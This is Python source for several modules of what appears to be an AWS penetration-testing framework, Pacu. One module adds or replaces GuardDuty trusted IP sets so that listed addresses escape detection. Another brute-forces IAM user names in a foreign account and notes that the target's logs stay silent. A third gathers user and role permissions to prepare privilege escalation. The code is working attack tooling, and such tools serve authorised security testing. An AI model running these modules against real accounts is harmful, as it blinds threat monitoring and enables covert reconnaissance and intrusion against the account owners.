parser.add_argument('--targets', required=False, default=None, help='Comma-separated list of GuardDuty detector IDs and regions to target (ex: sdasdasdasd@us-west2). By default, this module will check the database for enumerated detectors and offer to enumerate them if none are found.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions

    data = {'detectors': [], 'ip_sets': []}

    if args.targets:
        detectors = []
        regions = []
        targets = args.targets.split(',')
        for target in targets:
            id, region = target.split('@')
            detectors.append({'Id': id, 'Region': region})
            regions.append(region)
        regions = list(set(regions))
    else:
        regions = get_regions('GuardDuty')
        if fetch_data(['GuardDuty', 'Detectors'], module_info['prerequisite_modules'][0], '--guard-duty') is False:
            print('Pre-req module failed.')
            return
        detectors = copy.deepcopy(session.GuardDuty['Detectors'])

    for region in regions:
        client = pacu_main.get_boto3_client('guardduty', region)
        for detector in detectors:
            if detector['Region'] == region:
                print(' ({}) Detector {}:'.format(region, detector['Id']))
                data['detectors'].append(detector)
                try:
                    response = client.create_ip_set(
                        Activate=True,
                        DetectorId=detector['Id'],
                        Format='TXT',
                        Location=args.path,
                        Name=''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
                    )
                    ip_set_id = response['IpSetId']
                    data['ip_sets'].append(ip_set_id)
                    print('    Created IPSet: {}'.format(ip_set_id))
                except ClientError as error:
                    if 'an attempt to create resources beyond the current AWS account limits' in str(error):
                        print('    Error: Existing IPSet found')
                        print('    WARNING: Replacing an existing IPSet could have unintended bad consequences on the target environment. Proceed at your own risk.\n')
                        remove = input('Try to replace the IPSet? (y/n) ')
                        if remove.strip() == 'y':
                            try:
                                response = client.list_ip_sets(
                                    DetectorId=detector['Id']
                                )
                                # There is a max of one IPSet per detector
                                existing_ip_set_id = response['IpSetIds'][0]

                                client.update_ip_set(
                                    Activate=True,
                                    DetectorId=detector['Id'],
                                    Location=args.path,
                                    IpSetId=existing_ip_set_id
                                )

                                print('      Replaced IPSet {}...\n'.format(existing_ip_set_id))
                                data['ip_sets'].append(existing_ip_set_id)
                            except ClientError as error:
                                print('      Error: {}'.format(str(error)))
                    else:
                        print('      Error: {}'.format(str(error)))

    return data


def summary(data, pacu_main):
    return '{} IPSet(s) created for {} GuardDuty Detector(s).'.format(len(data['ip_sets']), len(data['detectors']))



#!/usr/bin/env python3
import argparse
import botocore


module_info = {
    'name': 'iam__enum_users',

    'author': 'Spencer Gietzen of Rhino Security Labs',

    'category': 'RECON_UNAUTH',

    'one_liner': 'Enumerates IAM users in a separate AWS account, given the account ID.',

    'description': 'This module takes in a valid AWS account ID and tries to enumerate existing IAM users within that account. It does so by trying to update the AssumeRole policy document of the role that you pass into --role-name. For your safety, it updates the policy with an explicit deny against the AWS account/IAM user, so that no security holes are opened in your account during enumeration. NOTE: It is recommended to use personal AWS access keys for this script, as it will spam CloudTrail with "iam:UpdateAssumeRolePolicy" logs. The target account will not see anything in their logs though! The keys used must have the iam:UpdateAssumeRolePolicy permission on the role that you pass into --role-name to be able to identify a valid IAM user.',

    'services': ['IAM'],

    'prerequisite_modules': [],

    'external_dependencies': [],

    'arguments_to_autocomplete': ['--word-list', '--role-name', '--account-id']
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--word-list', required=False, default=None, help='File path to a different word list to use. There is a default word list with 1100+ words. The word list should contain words, one on each line, to use to try and guess IAM user names. User names ARE case-sensitive.')
parser.add_argument('--role-name', required=True, help='The name of a valid role in the current users account to try and update the AssumeRole policy document for.')
parser.add_argument('--account-id', required=True, help='The AWS account ID of the target account (12 numeric characters).')


def main(args, pacu_main):
    args = parser.parse_args(args)
    print = pacu_main.print

    if not len(args.account_id) == 12 or not args.account_id.isdigit():
        print('Error: An AWS account ID is a number of length 12. You supplied: {}\n'.format(args.account_id))
        return None

    if args.word_list is None:
        word_list_path = './modules/{}/default-word-list.txt'.format(module_info['name'])
    else:
        word_list_path = args.word_list.strip()

    with open(word_list_path, 'r') as f:
        word_list = f.read().splitlines()

    print('Warning: This script does not check if the keys you supplied have the correct permissions. Make sure they are allowed to use iam:UpdateAssumeRolePolicy on the role that you pass into --role-name!\n')

    data = {
        'attempts': 0,
        'valid_users': []
    }

    client = pacu_main.get_boto3_client('iam')

    print('Targeting account ID: {}\n'.format(args.account_id))
    print('Starting user enumeration...\n')

    for word in word_list:
        user_arn = 'arn:aws:iam::{}:user/{}'.format(args.account_id, word)

        data['attempts'] += 1

        try:
            client.update_assume_role_policy(
                RoleName=args.role_name,
                PolicyDocument='{{"Version":"2012-10-17","Statement":[{{"Effect":"Deny","Principal":{{"AWS":"{}"}},"Action":"sts:AssumeRole"}}]}}'.format(user_arn)
            )
            print('  Found user: {}'.format(user_arn))
            data['valid_users'].append(user_arn)
        except botocore.exceptions.ClientError as error:
            if 'MalformedPolicyDocument' in str(error):
                # User doesn't exist, continue on
                pass
            elif 'NoSuchEntity' in str(error):
                print('  Error: You did not pass in a valid role name. An existing role is required for this script.')
                return data
            else:
                print('  Unhandled error: {}'.format(str(error)))
                return data

    if len(data['valid_users']) > 0:
        print('\nFound {} user(s):\n'.format(len(data['valid_users'])))
        for user in data['valid_users']:
            print('    {}'.format(user))
        print('')

    return data


def summary(data, pacu_main):
    return '  {} user(s) found after {} guess(es).'.format(len(data['valid_users']), data['attempts'])



#!/usr/bin/env python3
import argparse
import json
import re
import botocore

from botocore.exceptions import ClientError

from pacu.core.lib import strip_lines, save, downloads_dir
from pacu import Main

module_info = {
    'name': 'iam__enum_permissions',
    'author': 'Spencer Gietzen of Rhino Security Labs',
    'category': 'ENUM',
    'one_liner': 'Tries to get a confirmed list of permissions for the current (or all) user(s).',
    'description': strip_lines('''
        This module will attempt to use IAM APIs to enumerate a confirmed list of IAM permissions for users/roles in the
        account. By default, the owner of the active set of keys is targeted. This is done by checking attached and
        inline policies for the user and the groups they are in.
    '''),
    'services': ['IAM'],
    'prerequisite_modules': ['iam__enum_users_roles_policies_groups'],
    'arguments_to_autocomplete': ['--all-users', '--user-name']
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--all-users', required=False, default=False, action='store_true', help=strip_lines('''
    Run this module against every user in the account and store the results to 
    ~/.local/share/pacu/sessions/[current_session_name]/downloads/confirmed_permissions/user-[user_name].json. This data
    can then be run against the iam__privesc_scan module with the --offline flag enabled.
'''))
parser.add_argument('--user-name', required=False, default=None, help=strip_lines('''
    A single user name of a user to run this module against. By default, the active AWS keys will be used.
'''))
parser.add_argument('--all-roles', required=False, default=False, action='store_true', help=strip_lines('''
    Run this module against every role in the account and store the results to
    ~/.local/share/pacu/sessions/[current_session_name]/downloads/confirmed_permissions/role-[role_name].json. This data
    can then be run against the iam__privesc_scan module with the --offline flag enabled.
'''))
parser.add_argument('--role-name', required=False, default=None, help=strip_lines('''
    A single role name of a role to run this module against. By default, the active AWS keys will be used.
'''))


def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input

    key_info = pacu_main.key_info
    fetch_data = pacu_main.fetch_data
    ######

    summary_data = {
        'users_confirmed': 0,
        'roles_confirmed': 0
    }

    users = []
    roles = []

    if args.all_users is True:
        if fetch_data(['IAM', 'Users'], module_info['prerequisite_modules'][0], '--users') is False:
            print('FAILURE')
            print('  SUB-MODULE EXECUTION FAILED')
            return
        fetched_users = session.IAM['Users']
        for user in fetched_users:
            users.append({
                'UserName': user['UserName'],
                'PermissionsConfirmed': True,
                'Permissions': {
                    'Allow': {},
                    'Deny': {}
                }
            })
    elif args.user_name is not None:
        users.append({
            'UserName': args.user_name,
            'PermissionsConfirmed': True,
            'Permissions': {
                'Allow': {},
                'Deny': {}
            }
        })
        summary_data['single_user'] = args.user_name

    if args.all_roles is True:
        if fetch_data(['IAM', 'Roles'], module_info['prerequisite_modules'][0], '--roles') is False:
            print('FAILURE')
            print('  SUB-MODULE EXECUTION FAILED')
            return
        fetched_roles = session.IAM['Roles']
        for role in fetched_roles:
            roles.append({
                'RoleName': role['RoleName'],
                'PermissionsConfirmed': True,
                'Permissions': {
                    'Allow': {},
                    'Deny': {}
                }
            })
    elif args.role_name is not None:
        roles.append({
            'RoleName': args.role_name,
            'PermissionsConfirmed': True,
            'Permissions': {
                'Allow': {},
                'Deny': {}
            }
        })
        summary_data['single_role'] = args.role_name

    is_user = is_role = False

    if not any([args.all_users, args.user_name, args.all_roles, args.role_name]):
        client = pacu_main.get_boto3_client('sts')
        identity = client.get_caller_identity()
        active_aws_key = session.get_active_aws_key(pacu_main.database)

        if re.match(r'arn:aws:iam::\d{12}:user/', identity['Arn']) is not None:
            is_user = True
            client = pacu_main.get_boto3_client('iam')
            try:
                user = client.get_user()
                active_aws_key.update(
                    pacu_main.database,
                    user_name=user['User']['UserName'],
                    arn=identity['Arn'],
                    user_id=identity['UserId'],
                    account_id=identity['Account']
                )
            except botocore.exceptions.ClientError:
                username = input('Failed to discover the current users username, enter it now or Ctrl+C to exit the module: ').strip()
                if username:
                    active_aws_key.update(
                        pacu_main.database,
                        user_name=username,
                        arn=identity['Arn'],
                        user_id=identity['UserId'],
                        account_id=identity['Account']
                    )
                else:
                    # Update the information from get_caller_identity and exit
                    active_aws_key.update(
                        pacu_main.database,
                        arn=identity['Arn'],
                        user_id=identity['UserId'],
                        account_id=identity['Account']
                    )
                    return False
        elif re.match(r'arn:aws:sts::\d{12}:assumed-role/', identity['Arn']) is not None:
            is_role = True
            active_aws_key.update(
                pacu_main.database,
                role_name=identity['Arn'].split(':assumed-role/')[1].split('/')[-2],
                arn=identity['Arn'],
                user_id=identity['UserId'],
                account_id=identity['Account']
            )
        else:
            print('Not an IAM user or role. Exiting...\n')
            return False

        if is_user:
            user = key_info(alias=session.key_alias)
            user['PermissionsConfirmed'] = True
            user['Permissions'] = {'Allow': {}, 'Deny': {}}
            users.append(user)
            summary_data['single_user'] = user['UserName']
        elif is_role:
            roles.append({
                'RoleName': active_aws_key.role_name,
                'PermissionsConfirmed': True,
                'Permissions': {
                    'Allow': {},
                    'Deny': {}
                }
            })
            summary_data['single_role'] = active_aws_key.role_name

    # list-groups-for-user
    # list-user-policies
    # list-group-policies
    # list-role-policies
    # list-attached-role-policies
    # list-attached-group-policies
    # list-attached-user-policies
    # get-policy
    # get-policy-version
    # get-user-policy
    # get-group-policy
    # get-role-policy

    client = pacu_main.get_boto3_client('iam')
    if any([args.all_users, args.user_name, args.all_roles, args.role_name]):
        print('Permission Document Location:')
        print('  {}/confirmed_permissions/\n'.format(downloads_dir()))

    if roles:
        print('Confirming permissions for roles:')
        for role in roles:
            print('  {}...'.format(role['RoleName']))
            role['Policies'] = []

            try:
                # Get inline role policies
                policies = []
                try:
                    response = client.list_role_policies(
                        RoleName=role['RoleName']
                    )
                    policies = response['PolicyNames']
                    while 'IsTruncated' in response and response['IsTruncated'] is True:
                        response = client.list_role_policies(
                            RoleName=role['RoleName'],
                            Marker=response['Marker']
                        )
                        policies += response['PolicyNames']
                    for policy in policies:
                        role['Policies'].append({
                            'PolicyName': policy
                        })
                except ClientError as error:
                    print('    List role policies failed')
                    if error.response['Error']['Code'] == 'AccessDenied':
                        print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                    else:
                        print('      {}'.format(error.response['Error']['Code']))
                    role['PermissionsConfirmed'] = False

                # Get document for each inline policy
                for policy in policies:
                    try:
                        document = client.get_role_policy(
                            RoleName=role['RoleName'],
                            PolicyName=policy
                        )['PolicyDocument']
                    except ClientError as error:
                        print('    Get role policy failed')
                        if error.response['Error']['Code'] == 'AccessDenied':
                            print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                        else:
                            print('      {}'.format(error.response['Error']['Code']))
                        role['PermissionsConfirmed'] = False
                    role = parse_document(document, role)

                # Get attached role policies
                attached_policies = []
                try:
                    response = client.list_attached_role_policies(
                        RoleName=role['RoleName']
                    )
                    attached_policies = response['AttachedPolicies']
                    while 'IsTruncated' in response and response['IsTruncated'] is True:
                        response = client.list_attached_role_policies(
                            RoleName=role['RoleName'],
                            Marker=response['Marker']
                        )
                        attached_policies += response['AttachedPolicies']
                    role['Policies'] += attached_policies
                except ClientError as error:
                    print('    List attached role policies failed')
                    if error.response['Error']['Code'] == 'AccessDenied':
                        print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                    else:
                        print('      {}'.format(error.response['Error']['Code']))
                    role['PermissionsConfirmed'] = False

                role = parse_attached_policies(client, attached_policies, role)
                if role['PermissionsConfirmed']:
                    summary_data['roles_confirmed'] += 1

                if args.role_name is None and args.all_roles is False:
                    print('    Confirmed permissions for {}'.format(role['RoleName']))
                    active_aws_key.update(
                        pacu_main.database,
                        role_name=role['RoleName'],
                        policies=role['Policies'],
                        permissions_confirmed=role['PermissionsConfirmed'],
                        allow_permissions=role['Permissions']['Allow'],
                        deny_permissions=role['Permissions']['Deny']
                    )
                else:
                    with save('confirmed_permissions/role-{}.json'.format(role['RoleName']), 'w+') as f:
                        json.dump(role, f, indent=2, default=str)

                    print('    Permissions stored in role-{}.json'.format(role['RoleName']))
            except ClientError as error:
                if error.response['Error']['Code'] == 'AccessDenied':
                    print('  FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                else:
                    print('  {}'.format(error.response['Error']['Code']))
                print('Skipping {}'.format(role['RoleName']))
        if users:
            print()

    if users:
        print('Confirming permissions for users:')
        for user in users:
            print('  {}...'.format(user['UserName']))
            user['Groups'] = []
            user['Policies'] = []
            try:
                policies = []

                # Get groups that the user is in
                try:
                    response = client.list_groups_for_user(
                        UserName=user['UserName']
                    )
                    user['Groups'] = response['Groups']
                    while 'IsTruncated' in response and response['IsTruncated'] is True:
                        response = client.list_groups_for_user(
                            UserName=user['UserName'],
                            Marker=response['Marker']
                        )
                        user['Groups'] += response['Groups']
                except ClientError as error:
                    print('    List groups for user failed')
                    if error.response['Error']['Code'] == 'AccessDenied':
                        print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                    else:
                        print('      {}'.format(error.response['Error']['Code']))
                    user['PermissionsConfirmed'] = False

                # Get inline and attached group policies
                for group in user['Groups']:
                    group['Policies'] = []
                    # Get inline group policies
                    try:
                        response = client.list_group_policies(
                            GroupName=group['GroupName']
                        )
                        policies = response['PolicyNames']
                        while 'IsTruncated' in response and response['IsTruncated'] is True:
                            response = client.list_group_policies(
                                GroupName=group['GroupName'],
                                Marker=response['Marker']
                            )
                            policies += response['PolicyNames']
                    except ClientError as error:
                        print('     List group policies failed')
                        if error.response['Error']['Code'] == 'AccessDenied':
                            print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                        else:
                            print('      {}'.format(error.response['Error']['Code']))
                        user['PermissionsConfirmed'] = False

                    # Get document for each inline policy
                    for policy in policies:
                        group['Policies'].append({  # Add policies to list of policies for this group
                            'PolicyName': policy
                        })
                        try:
                            document = client.get_group_policy(
                                GroupName=group['GroupName'],
                                PolicyName=policy
                            )['PolicyDocument']
                        except ClientError as error:
                            print('     Get group policy failed')
                            if error.response['Error']['Code'] == 'AccessDenied':
                                print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                            else:
                                print('      {}'.format(error.response['Error']['Code']))
                            user['PermissionsConfirmed'] = False
                        user = parse_document(document, user)

                    # Get attached group policies
                    attached_policies = []
                    try:
                        response = client.list_attached_group_policies(
                            GroupName=group['GroupName']
                        )
                        attached_policies = response['AttachedPolicies']
                        while 'IsTruncated' in response and response['IsTruncated'] is True:
                            response = client.list_attached_group_policies(
                                GroupName=group['GroupName'],
                                Marker=response['Marker']
                            )
                            attached_policies += response['AttachedPolicies']
                        group['Policies'] += attached_policies
                    except ClientError as error:
                        print('    List attached group policies failed')
                        if error.response['Error']['Code'] == 'AccessDenied':
                            print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                        else:
                            print('      {}'.format(error.response['Error']['Code']))
                        user['PermissionsConfirmed'] = False
                    user = parse_attached_policies(client, attached_policies, user)

                # Get inline user policies
                policies = []
                if 'Policies' not in user:
                    user['Policies'] = []
                try:
                    response = client.list_user_policies(
                        UserName=user['UserName']
                    )
                    policies = response['PolicyNames']
                    while 'IsTruncated' in response and response['IsTruncated'] is True:
                        response = client.list_user_policies(
                            UserName=user['UserName'],
                            Marker=response['Marker']
                        )
                        policies += response['PolicyNames']
                    for policy in policies:
                        user['Policies'].append({
                            'PolicyName': policy
                        })
                except ClientError as error:
                    print('    List user policies failed')
                    if error.response['Error']['Code'] == 'AccessDenied':
                        print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                    else:
                        print('      {}'.format(error.response['Error']['Code']))
                    user['PermissionsConfirmed'] = False

                # Get document for each inline policy
                for policy in policies:
                    try:
                        document = client.get_user_policy(
                            UserName=user['UserName'],
                            PolicyName=policy
                        )['PolicyDocument']
                    except ClientError as error:
                        print('    Get user policy failed')
                        if error.response['Error']['Code'] == 'AccessDenied':
                            print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                        else:
                            print('      {}'.format(error.response['Error']['Code']))
                        user['PermissionsConfirmed'] = False
                    user = parse_document(document, user)

                # Get attached user policies
                attached_policies = []
                try:
                    response = client.list_attached_user_policies(
                        UserName=user['UserName']
                    )
                    attached_policies = response['AttachedPolicies']
                    while 'IsTruncated' in response and response['IsTruncated'] is True:
                        response = client.list_attached_user_policies(
                            UserName=user['UserName'],
                            Marker=response['Marker']
                        )
                        attached_policies += response['AttachedPolicies']
                    user['Policies'] += attached_policies
                except ClientError as error:
                    print('    List attached user policies failed')
                    if error.response['Error']['Code'] == 'AccessDenied':
                        print('      FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                    else:
                        print('      {}'.format(error.response['Error']['Code']))
                    user['PermissionsConfirmed'] = False

                user = parse_attached_policies(client, attached_policies, user)
                if user['PermissionsConfirmed']:
                    summary_data['users_confirmed'] += 1

                if args.user_name is None and args.all_users is False:
                    print('    Confirmed Permissions for {}'.format(user['UserName']))
                    active_aws_key.update(
                        pacu_main.database,
                        user_name=user['UserName'],
                        arn=user['Arn'],
                        user_id=user['UserId'],
                        groups=user['Groups'],
                        policies=user['Policies'],
                        permissions_confirmed=user['PermissionsConfirmed'],
                        allow_permissions=user['Permissions']['Allow'],
                        deny_permissions=user['Permissions']['Deny']
                    )
                else:
                    with save('confirmed_permissions/user-{}.json'.format(session.name, user['UserName']), 'w+') as f:
                        json.dump(user, f, indent=2, default=str)

                    print('    Permissions stored in user-{}.json'.format(user['UserName']))
            except ClientError as error:
                if error.response['Error']['Code'] == 'AccessDenied':
                    print('  FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                else:
                    print('  {}'.format(error.response['Error']['Code']))
                print('Skipping {}'.format(user['UserName']))

    return summary_data


def summary(data, pacu_main):
    out = ''
    if not data:
        return '  Unable to find users/roles to enumerate permissions\n'
    if data['users_confirmed'] == 1:
        out += '  Confirmed permissions for user: {}.\n'.format(data['single_user'])
    else:
        out += '  Confirmed permissions for {} user(s).\n'.format(data['users_confirmed'])

    if data['roles_confirmed'] == 1:
        out += '  Confirmed permissions for role: {}.\n'.format(data['single_role'])
    else:
        out += '  Confirmed permissions for {} role(s).\n'.format(data['roles_confirmed'])
    return out


def parse_attached_policies(client, attached_policies, user):
    """ Pull permissions from each policy document. """
    for policy in attached_policies:
        document = get_attached_policy(client, policy['PolicyArn'])
        if document is False:
            user['PermissionsConfirmed'] = False
        else:
            user = parse_document(document, user)
    return user


def get_attached_policy(client, policy_arn):
    """ Get the policy document of an attached policy. """
    try:
        policy = client.get_policy(
            PolicyArn=policy_arn
        )['Policy']
        version = policy['DefaultVersionId']
        can_get = True
    except Exception as error:
        print('Get policy failed: {}'.format(error))
        return False

        # NOTE: If v1, v2, and v3 exist, then v2 is deleted, the next version will be v4 still, so this WILL error currently
        # print('Attempting to enumerate the default version...')
        # can_get = False

    try:
        if can_get is True:
            document = client.get_policy_version(
                PolicyArn=policy_arn,
                VersionId=version
            )['PolicyVersion']['Document']
            return document

        # else:  # If the user can't run get_policy, try to run get_policy_version to enumerate the default version
        #     for version in ['v1', 'v2', 'v3', 'v4', 'v5']:  # This won't error because it will return the default version before fetching a non-existent version
        #         policy_version = client.get_policy_version(
        #             PolicyArn=policy_arn,
        #             VersionId=version
        #         )['PolicyVersion']
        #         if policy_version['IsDefaultVersion'] is True:
        #             return policy_version['Document']

    except Exception as error:
        print('Get policy version failed: {}'.format(error))
        return False


def parse_document(document, user):
    """ Loop permissions, resources, and conditions """
    if isinstance(document['Statement'], dict):
        document['Statement'] = [document['Statement']]

    for statement in document['Statement']:

        if statement['Effect'] == 'Allow':

            if 'Action' in statement and isinstance(statement['Action'], list):  # Check if the action is a single action (str) or multiple (list)
                statement['Action'] = list(set(statement['Action']))  # Remove duplicates to stop the circular reference JSON error
                for action in statement['Action']:
                    if action in user['Permissions']['Allow']:
                        if isinstance(statement['Resource'], list):
                            user['Permissions']['Allow'][action]['Resources'] += statement['Resource']
                        else:
                            user['Permissions']['Allow'][action]['Resources'].append(statement['Resource'])
                    else:
                        user['Permissions']['Allow'][action] = {'Resources': [], 'Conditions': []}
                        resource = statement.get('Resource')
                        if isinstance(resource, list):
                            user['Permissions']['Allow'][action]['Resources'] = statement['Resource']
                        elif resource:
                            user['Permissions']['Allow'][action]['Resources'] = [statement['Resource']]
                        else:
                            identity = user.get('UserName') or user.get('RoleName')
                            print("[WARN] No 'Resource' section found. The policy for {} likely contains NotResource "
                                  "and our recorded permissions on it will likely be incomplete.".format(identity))

                    if 'Condition' in statement:
                            user['Permissions']['Allow'][action]['Conditions'].append(statement['Condition'])
                    user['Permissions']['Allow'][action]['Resources'] = list(set(user['Permissions']['Allow'][action]['Resources']))  # Remove duplicate resources

            elif 'Action' in statement and isinstance(statement['Action'], str):
                if statement['Action'] in user['Permissions']['Allow']:
                    if isinstance(statement['Resource'], list):
                        user['Permissions']['Allow'][statement['Action']]['Resources'] += statement['Resource']
                    else:
                        user['Permissions']['Allow'][statement['Action']]['Resources'].append(statement['Resource'])
                else:
                    user['Permissions']['Allow'][statement['Action']] = {'Resources': [], 'Conditions': []}
                    if isinstance(statement['Resource'], list):
                        user['Permissions']['Allow'][statement['Action']]['Resources'] = statement['Resource']
                    else:
                        user['Permissions']['Allow'][statement['Action']]['Resources'] = [statement['Resource']]  # Make sure that resources are always arrays
                if 'Condition' in statement:
                    user['Permissions']['Allow'][statement['Action']]['Conditions'].append(statement['Condition'])
                user['Permissions']['Allow'][statement['Action']]['Resources'] = list(set(user['Permissions']['Allow'][statement['Action']]['Resources']))  # Remove duplicate resources

            if 'NotAction' in statement and isinstance(statement['NotAction'], list):  # NotAction is reverse, so allowing a NotAction is denying that action basically
                statement['NotAction'] = list(set(statement['NotAction']))  # Remove duplicates to stop the circular reference JSON error
                for not_action in statement['NotAction']:
                    if '!{}'.format(not_action) in user['Permissions']['Allow']:
                        if isinstance(statement['Resource'], list):
                            user['Permissions']['Allow']['!{}'.format(not_action)]['Resources'] += statement['Resource']
                        else:
                            user['Permissions']['Allow']['!{}'.format(not_action)]['Resources'].append(statement['Resource'])
                    else:
                        user['Permissions']['Allow']['!{}'.format(not_action)] = {'Resources': [], 'Conditions': []}
                        if isinstance(statement['Resource'], list):
                            user['Permissions']['Allow']['!{}'.format(not_action)]['Resources'] = statement['Resource']
                        else:
                            user['Permissions']['Allow']['!{}'.format(not_action)]['Resources'] = [statement['Resource']]
                    if 'Condition' in statement:
                        user['Permissions']['Allow']['!{}'.format(not_action)]['Conditions'].append(statement['Condition'])
                    user['Permissions']['Allow']['!{}'.format(not_action)]['Resources'] = list(set(user['Permissions']['Allow']['!{}'.format(not_action)]['Resources']))  # Remove duplicate resources

            elif 'NotAction' in statement and isinstance(statement['NotAction'], str):
                if '!{}'.format(statement['NotAction']) in user['Permissions']['Allow']:
                    if isinstance(statement['Resource'], list):
                        user['Permissions']['Allow']['!{}'.format(statement['NotAction'])]['Resources'] += statement['Resource']
                    else:
                        user['Permissions']['Allow']['!{}'.format(statement['NotAction'])]['Resources'].append(statement['Resource'])
                else:
                    user['Permissions']['Allow']['!{}'.format(statement['NotAction'])] = {'Resources': [], 'Conditions': []}
                    if isinstance(statement['Resource'], list):
                        user['Permissions']['Allow']['!{}'.format(statement['NotAction'])]['Resources'] = statement['Resource']
                    else:
                        user['Permissions']['Allow']['!{}'.format(statement['NotAction'])]['Resources'] = [statement['Resource']]  # Make sure that resources are always arrays
                if 'Condition' in statement:
                    user['Permissions']['Allow']['!{}'.format(statement['NotAction'])]['Conditions'].append(statement['Condition'])
                user['Permissions']['Allow']['!{}'.format(statement['NotAction'])]['Resources'] = list(set(user['Permissions']['Allow']['!{}'.format(statement['NotAction'])]['Resources']))  # Remove duplicate resources

        if statement['Effect'] == 'Deny':

            if 'Action' in statement and isinstance(statement['Action'], list):
                statement['Action'] = list(set(statement['Action']))  # Remove duplicates to stop the circular reference JSON error
                for action in statement['Action']:
                    if action in user['Permissions']['Deny']:
                        if isinstance(statement['Resource'], list):
                            user['Permissions']['Deny'][action]['Resources'] += statement['Resource']
                        else:
                            user['Permissions']['Deny'][action]['Resources'].append(statement['Resource'])
                    else:
                        user['Permissions']['Deny'][action] = {'Resources': [], 'Conditions': []}
                        if isinstance(statement['Resource'], list):
                            user['Permissions']['Deny'][action]['Resources'] = statement['Resource']
                        else:
                            user['Permissions']['Deny'][action]['Resources'] = [statement['Resource']]
                    if 'Condition' in statement:
                        user['Permissions']['Deny'][action]['Conditions'].append(statement['Condition'])
                    user['Permissions']['Deny'][action]['Resources'] = list(set(user['Permissions']['Deny'][action]['Resources']))  # Remove duplicate resources

            elif 'Action' in statement and isinstance(statement['Action'], str):
                if statement['Action'] in user['Permissions']['Deny']:
                    if isinstance(statement['Resource'], list):
                        user['Permissions']['Deny'][statement['Action']]['Resources'] += statement['Resource']
                    else:
                        user['Permissions']['Deny'][statement['Action']]['Resources'].append(statement['Resource'])
                else:
                    user['Permissions']['Deny'][statement['Action']] = {'Resources': [], 'Conditions': []}
                    if isinstance(statement['Resource'], list):
                        user['Permissions']['Deny'][statement['Action']]['Resources'] = statement['Resource']
                    else:
                        user['Permissions']['Deny'][statement['Action']]['Resources'] = [statement['Resource']]  # Make sure that resources are always arrays
                if 'Condition' in statement:
                    user['Permissions']['Deny'][statement['Action']]['Conditions'].append(statement['Condition'])
                user['Permissions']['Deny'][statement['Action']]['Resources'] = list(set(user['Permissions']['Deny'][statement['Action']]['Resources']))  # Remove duplicate resources

            if 'NotAction' in statement and isinstance(statement['NotAction'], list):  # NotAction is reverse, so allowing a NotAction is denying that action basically
                statement['NotAction'] = list(set(statement['NotAction']))  # Remove duplicates to stop the circular reference JSON error
                for not_action in statement['NotAction']:
                    if '!{}'.format(not_action) in user['Permissions']['Deny']:
                        if isinstance(statement['Resource'], list):
                            user['Permissions']['Deny']['!{}'.format(not_action)]['Resources'] += statement['Resource']
                        else:
                            user['Permissions']['Deny']['!{}'.format(not_action)]['Resources'].append(statement['Resource'])
                    else:
                        user['Permissions']['Deny']['!{}'.format(not_action)] = {'Resources': [], 'Conditions': []}
                        if isinstance(statement['Resource'], list):
                            user['Permissions']['Deny']['!{}'.format(not_action)]['Resources'] = statement['Resource']
                        else:
                            user['Permissions']['Deny']['!{}'.format(not_action)]['Resources'] = [statement['Resource']]
                    if 'Condition' in statement:
                        user['Permissions']['Deny']['!{}'.format(not_action)]['Conditions'].append(statement['Condition'])
                    user['Permissions']['Deny']['!{}'.format(not_action)]['Resources'] = list(set(user['Permissions']['Deny']['!{}'.format(not_action)]['Resources']))  # Remove duplicate resources

            elif 'NotAction' in statement and isinstance(statement['NotAction'], str):
                if '!{}'.format(statement['NotAction']) in user['Permissions']['Deny']:
                    if isinstance(statement['Resource'], list):
                        user['Permissions']['Deny']['!{}'.format(statement['NotAction'])]['Resources'] += statement['Resource']
                    else:
                        user['Permissions']['Deny']['!{}'.format(statement['NotAction'])]['Resources'].append(statement['Resource'])
                else:
                    user['Permissions']['Deny']['!{}'.format(statement['NotAction'])] = {'Resources': [], 'Conditions': []}
                    if isinstance(statement['Resource'], list):
                        user['Permissions']['Deny']['!{}'.format(statement['NotAction'])]['Resources'] = statement['Resource']
                    else:
                        user['Permissions']['Deny']['!{}'.format(statement['NotAction'])]['Resources'] = [statement['Resource']]  # Make sure that resources are always arrays
                if 'Condition' in statement:
                    user['Permissions']['Deny']['!{}'.format(statement['NotAction'])]['Conditions'].append(statement['Condition'])
                user['Permissions']['Deny']['!{}'.format(statement['NotAction'])]['Resources'] = list(set(user['Permissions']['Deny']['!{}'.format(statement['NotAction'])]['Resources']))  # Remove duplicate resources

    return user



import signal
import sys
import typing
from typing import Optional, Union

from sqlalchemy import create_engine, orm
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker

from pacu.core.base import DATABASE_CONNECTION_PATH
from datetime import datetime


def get_database_connection(database_connection_path: str=DATABASE_CONNECTION_PATH) -> orm.session.Session:
    """ Unlike database file paths, database connection paths must begin with
    sqlite:/// """
    assert database_connection_path.startswith('sqlite:///'), 'Database connection path must start with sqlite:///'

    engine = create_engine(database_connection_path)
    Session = sessionmaker(bind=engine)

    return Session()

def remove_empty_from_dict(d: Union[dict, list, typing.Any]) -> Union[dict, list, typing.Any]:
    """ Reference: https://stackoverflow.com/a/24893252 """
    if type(d) is dict:
        d = typing.cast(dict, d)
        return dict((k, remove_empty_from_dict(v)) for k, v in d.items() if v and remove_empty_from_dict(v))

    elif type(d) is list:
        d = typing.cast(list, d)
        return [remove_empty_from_dict(v) for v in d if v and remove_empty_from_dict(v)]

    else:
        return d


